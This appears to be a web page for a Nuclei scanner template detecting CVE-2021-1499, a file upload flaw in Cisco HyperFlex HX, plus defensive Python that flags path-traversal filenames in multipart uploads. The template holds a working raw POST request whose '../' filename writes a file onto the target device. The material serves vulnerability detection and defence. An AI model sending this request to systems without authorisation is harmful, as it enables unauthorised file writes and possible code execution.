Cisco HyperFlex HX Data Platform - Arbitrary File Upload
ID: CVE-2021-1499
Severity: medium
Author: gy741
Tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco
Description
Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
YAML Source
id: CVE-2021-1499

info:
  name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload
  author: gy741
  severity: medium
  description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.
  impact: |
    Allows an attacker to upload and execute arbitrary files on the target system
  remediation: |
    Apply the necessary security patches or updates provided by Cisco
  reference:
    - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz
    - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-1499
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-1499
    cwe-id: CWE-306
    epss-score: 0.96279
    epss-percentile: 0.99533
    cpe: cpe:2.3:h:cisco:hyperflex_hx220c_af_m5:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cisco
    product: hyperflex_hx220c_af_m5
  tags: cve2021,cve,fileupload,intrusive,packetstorm,cisco

http:
  - raw:
      - |
        POST /upload HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583
        Origin: {{RootURL}}
        Referer: {{RootURL}}

        -----------------------------253855577425106594691130420583
        Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
        Content-Type: application/json

        MyPasswdNewData->/api/tomcat

        -----------------------------253855577425106594691130420583--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{"result":'
          - '"filename:'
          - '/tmp/passwd9'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d79198b08bbde63516ebc22e61010601c94397ad1bce287a7d1e7e4be8c74c0e02202c2bbab7a02fc970ef63156092701f6015124a4a62520513354cd392c2c291b7:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-1499.yaml"
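On the defensive side, the signal in the template's request is the `filename` parameter of the multipart part, which climbs out of the upload directory with `../` segments. The following is an added example, not part of the template or of Cisco's code: it extracts `filename` values from a multipart body and flags any that would resolve outside the intended directory. The upload directory `/srv/uploads`, the function names and the benign body are assumptions made for illustration.

```python
import posixpath
import re
from typing import List, Optional

# Assumption: hypothetical directory the upload handler is meant to write into.
UPLOAD_DIR = "/srv/uploads"

_FILENAME_RE = re.compile(
    r'^Content-Disposition:[^\r\n]*?\bfilename="([^"]*)"',
    re.IGNORECASE | re.MULTILINE,
)

# Multipart body as it appears in the template's raw request.
TEMPLATE_BODY = (
    "-----------------------------253855577425106594691130420583\r\n"
    'Content-Disposition: form-data; name="file"; '
    'filename="../../../../../tmp/passwd9"\r\n'
    "Content-Type: application/json\r\n\r\n"
    "MyPasswdNewData->/api/tomcat\r\n"
    "-----------------------------253855577425106594691130420583--\r\n"
)

# Constructed benign upload for comparison.
BENIGN_BODY = (
    "--constructed-boundary\r\n"
    'Content-Disposition: form-data; name="file"; filename="report.json"\r\n'
    "Content-Type: application/json\r\n\r\n{}\r\n"
    "--constructed-boundary--\r\n"
)


def extract_filenames(body: str) -> List[str]:
    """Return every filename= value declared in a multipart/form-data body."""
    return _FILENAME_RE.findall(body)


def resolve_upload(filename: str, upload_dir: str = UPLOAD_DIR) -> Optional[str]:
    """Return the normalized target path, or None if it leaves upload_dir."""
    # Treat backslashes as separators so "..\" is normalized like "../".
    candidate = filename.replace("\\", "/")
    # join() discards upload_dir for absolute names; normpath() collapses "..".
    target = posixpath.normpath(posixpath.join(upload_dir, candidate))
    root = upload_dir.rstrip("/") + "/"
    return target if target.startswith(root) else None


def flag_traversal(body: str) -> List[str]:
    """List filenames in the body that would be written outside upload_dir."""
    return [f for f in extract_filenames(body) if resolve_upload(f) is None]
```

The same `resolve_upload` check fits in an upload handler before the write, and `flag_traversal` can be run over captured request bodies sent to `/upload`.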